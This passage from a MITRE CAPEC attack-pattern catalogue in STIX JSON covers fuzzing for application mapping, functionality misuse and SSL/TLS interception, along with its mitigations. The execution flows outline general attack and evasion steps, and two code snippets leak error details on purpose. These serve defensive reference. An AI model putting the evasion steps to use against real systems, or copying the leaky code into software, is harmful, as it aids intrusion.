"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Verify authenticity of all identifiers at runtime.", + "id": 
"course-of-action--3daed4ec-09d3-48c0-ac50-b37755e9928c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4a9103ab-a9ea-40f7-9a9c-2789bebcf094", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3daed4ec-09d3-48c0-ac50-b37755e9928c", + "spec_version": "2.1", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.", + "external_references": [ + { + "external_id": "CAPEC-211", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/211.html" + } + ], + "id": "attack-pattern--2f50c4ba-bba9-456b-8fc3-7a551ed4c65f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Leveraging web tools (e.g. Mozilla's GreaseMonkey, Firebug) to change application behavior", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary leverages a legitimate capability of an application in such a way as to achieve a negative technical impact. 
The system functionality is not altered or modified but used in a way that was not intended. This is often accomplished through the overuse of a specific functionality or by leveraging functionality with design flaws that enables the adversary to gain access to unauthorized, sensitive data.", + "external_references": [ + { + "external_id": "CAPEC-212", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/212.html" + }, + { + "external_id": "CWE-1242", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1242.html" + }, + { + "external_id": "CWE-1246", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1246.html" + }, + { + "external_id": "CWE-1281", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1281.html" + } + ], + "id": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Functionality Misuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ], + "Confidentiality": [ + "Gain Privileges (A successful attack of this kind can compromise the confidentiality of an authorized user's credentials.)", + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ], + "Integrity": [ + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + 
"attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a", + "attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37" + ], + "x_capec_prerequisites": [ + "The adversary has the capability to interact with the application directly.The target system does not adequately implement safeguards to prevent misuse of authorized actions/processes." + ], + "x_capec_skills_required": { + "Low": "General computer knowledge about how applications are launched, how they interact with input/output, and how they are configured." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform comprehensive threat modeling, a process of identifying, evaluating, and mitigating potential threats to the application. 
This effort can help reveal potentially obscure application functionality that can be manipulated for malicious purposes.", + "id": "course-of-action--2c554d44-955a-43f5-bf93-2d6bfe5ebcf0", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-212-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--264be4df-68bd-477a-8b05-e975efd6ada7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2c554d44-955a-43f5-bf93-2d6bfe5ebcf0", + "spec_version": "2.1", + "target_ref": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When implementing security features, consider how they can be misused and compromised.", + "id": "course-of-action--b6e8099d-d2e6-4786-a628-0dac80173c67", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-212-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3688d3c6-8574-4547-aa9d-2d75e6da59b3", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b6e8099d-d2e6-4786-a628-0dac80173c67", + "spec_version": "2.1", + 
"target_ref": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-126 : Path Traversal\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-213", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/213.html" + } + ], + "id": "attack-pattern--3ec96bbd-da0c-4640-a8ae-50e506206a2b", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Directory Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was merged into \"CAPEC-215 : Fuzzing for application mapping\". 
Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-214", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/214.html" + } + ], + "id": "attack-pattern--27f34b27-52ae-42ae-a5c4-1155641eab90", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DEPRECATED: Fuzzing for garnering J2EE/.NET-based stack traces, for application mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. 
In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash.", + "external_references": [ + { + "external_id": "CAPEC-215", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/215.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-532", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/532.html" + } + ], + "id": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Fuzzing for application mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "attack-pattern--7f0ec88f-b057-4a73-93d8-8a30cfdbcf77" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n The following code generates an error message that leaks the full pathname of the configuration file.\n $ConfigDir = \"/home/myprog/config\";$uname = GetUserInput(\"username\");ExitError(\"Bad hacker!\") if ($uname !~ /^\\w+$/);$file = \"$ConfigDir/$uname.txt\";if (! (-e $file)) { ExitError(\"Error: $file does not exist\"); }...\n If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. 
It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application.\n ", + "\n In languages that utilize stack traces, revealing them can give adversaries information that allows them to map functions and file locations for an application. The following Java method prints out a stack trace that exposes the application to this attack pattern.\n public void httpGet(HttpServletRequest request, HttpServletResponse response) {try {processRequest();} catch (Exception ex) {ex.printStackTrace(response.getWriter());\n return;}}\n If this code is running on a server, such as a web application, then the adversary could cause the exception to be printed through fuzzing.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Observe communication and inputs: The fuzzing adversary observes the target system looking for inputs and communications between modules, subsystems, or systems.

  2. Techniques
    Network sniffing. Using a network sniffer such as wireshark, the adversary observes communications into and out of the target system.
    Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the adversary observes the system calls and API calls that are made by the target system, and the nature of their parameters.
    Observe inputs using web inspection tools (OWASP's WebScarab, Paros, TamperData, TamperIE, etc.)

Experiment

  1. Generate fuzzed inputs: Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.

  2. Techniques
    Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).
    Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system.
  3. Observe the outcome: Observe the outputs to the inputs fed into the system by fuzzers and see if there are any log or error messages that might provide information to map the application

Exploit

  1. Craft exploit payloads: An adversary usually needs to modify the fuzzing parameters according to the observed error messages to get the desired sensitive information for the application. To defeat correlation, the adversary may try changing the origin IP addresses or client browser identification strings or start a new session from where they left off in obfuscating the attack.

  2. Techniques
    Modify the parameters in the fuzzing tool according to the observed error messages. Repeat with enough parameters until the application has been sufficiently mapped.
    If the application rejects the large amount of fuzzing messages from the same host machine, the adversary needs to hide the attacks by changing the IP addresses or other credentials.
", + "x_capec_extended_description": "\n By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information. In applications that return a stack trace along with the error, this can enumerate the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must fail to sanitize incoming messages adequately before processing." + ], + "x_capec_resources_required": [ + "Fuzzing tools, which automatically generate and send message variants, are necessary for this attack. The attacker must have sufficient access to send messages to the target. The attacker must also have the ability to observe the target application's log and/or error messages in order to collect information about the target." + ], + "x_capec_skills_required": { + "Medium": "Although fuzzing parameters is not difficult, and often possible with automated fuzzing tools, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Construct a 'code book' for error messages. 
When using a code book, application error messages aren't generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--35e6212f-ac45-4ebb-88b6-9242f8ae2bba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-215-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e83220a2-4674-498f-8f1f-684464a2de79", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--35e6212f-ac45-4ebb-88b6-9242f8ae2bba", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. 
Such a technique is often used in conjunction with the above 'code book' suggestion.", + "id": "course-of-action--81ed39dc-bf22-4d9b-901c-370ff16e02f3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-215-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6313ef4d-92ce-4fa2-89d3-e46c3645bc94", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--81ed39dc-bf22-4d9b-901c-370ff16e02f3", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--98fe200c-e422-46ab-a1e3-1ece266fe87a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3b7fd0f-034a-4c49-b011-83527159115d", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7e3a6f-e895-4472-8fb2-87fd4ae495ac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c4fec7a6-c3eb-48d8-b840-e4fad7c771c8", + "spec_version": "2.1", 
+ "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2827e6fe-cb69-4bb9-a62c-a073e37c5f85", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3205de43-5293-4d4e-9d84-74590957951a", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3fad702-176c-4e46-ad84-47ac9e37f083", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f23b69e-8624-4f1f-b185-f98b16b4714f", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3df53c6f-ed1d-45c8-9248-169adc95cc23", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--d72a7c6c-d377-4769-b5de-86fe57fc39cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac6b5101-4c5f-42e5-9d3c-ebee7b25bae7", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates a setting or parameter on communications channel in order to compromise its security. This can result in information exposure, insertion/removal of information from the communications stream, and/or potentially system compromise.", + "external_references": [ + { + "external_id": "CAPEC-216", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/216.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + } + ], + "id": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Communication Channel Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful Communication Channel Manipulation attack can result in sensitive information exposure to the adversary, thereby compromising the communication channel's confidentiality.)" + ], + "Integrity": [ + "Read Data (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)", + "Modify Data (The adversary's 
injection of additional content into a communication channel negatively impacts the integrity of that channel.)", + "Other (The adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--d9904019-98fa-4beb-ae5a-f667e516269e", + "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf" + ], + "x_capec_prerequisites": [ + "The target application must leverage an open communications channel.", + "The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)." + ], + "x_capec_resources_required": [ + "A tool that is capable of viewing network traffic and generating custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt all sensitive communications using properly-configured cryptography.", + "id": "course-of-action--6d7d16e2-5680-47ba-942a-5b43c3541123", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c654fbc8-bc2b-454c-9398-3918f016c72b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d7d16e2-5680-47ba-942a-5b43c3541123", + "spec_version": "2.1", + "target_ref": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design the communication system such that it associates proper authentication/authorization with each channel/message.", + "id": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4825728c-cd47-4e1a-a705-02257ab81012", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "spec_version": "2.1", + "target_ref": "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary takes advantage of incorrectly configured SSL/TLS communications that enables access to data intended to be encrypted. 
The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.", + "external_references": [ + { + "external_id": "CAPEC-217", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/217.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploiting Incorrectly Configured SSL/TLS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--861cfb48-ba7c-4568-86c9-43ac6985ac65" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "Using MITM techniques, an adversary launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the adversary to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of either the server or client being targeted, preferably both. This is not a hard requirement, as the adversary can simply assume commonly exploitable configuration settings and indiscriminately attempt them.

  2. Techniques
    If the target is a webpage, some of the SSL/TLS configuration can be viewed through the browser's security information, such as the key sizes and cipher being used.

Experiment

  1. Intercept Communication: Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94).

  2. Techniques
    Create a malicious webpage that looks identical to the target webpage, but routes client traffic to the server such that the adversary can observe the traffic and perform an adverary in the middle attack.
    If the adversary has access to the network that either the client or server is on, the can attempt to use a packet sniffer to perform an adversary in the middle attack.
    Install a packet sniffer through malware directly to a client device that can intercept SSL/TLS traffic and perform an adversary in the middle attack.

Exploit

  1. Capture or Manipulate Sensitive Data: Once the adversary has the ability to intercept the secure communication, they exploit the incorrectly configured SSL to view the encrypted communication. The adversary can choose to just record the secure communication or manipulate the data to achieve a desired effect.

  2. Techniques
    Use known exploits for old SSL and TLS versions.
    Use known exploits for weak ciphers such as DES and RC4.
", + "x_capec_extended_description": "SSL/TLS communications become vulnerable to this attack when they use outdated versions and insecure ciphers. Currently, all SSL versions are deprecated and TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still possible for later versions of TLS to be insecure if they are configured with insecure ciphers such as 3DES or RC4.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the client/server stream." + ], + "x_capec_resources_required": [ + "The adversary needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time." + ], + "x_capec_skills_required": { + "High": "The adversary needs real-time access to network traffic in such a manner that the adversary can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use SSL, as all SSL versions have been broken and should not be used. 
If TLS is not an option for the client or server, consider setting timeouts on SSL sessions to extremely low values to lessen the potential impact.", + "id": "course-of-action--a016c6dd-9ad2-4313-a1ac-feb6f4d5c593", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0973ae1-9f6a-4c40-9fea-2a3ee0e97625", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a016c6dd-9ad2-4313-a1ac-feb6f4d5c593", + "spec_version": "2.1", + "target_ref": "attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only use TLS version 1.2+, as versions 1.0 and 1.1 are insecure.", + "id": "course-of-action--5a4ac34c-6d63-45ca-a2e5-260d4d0b39f1", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 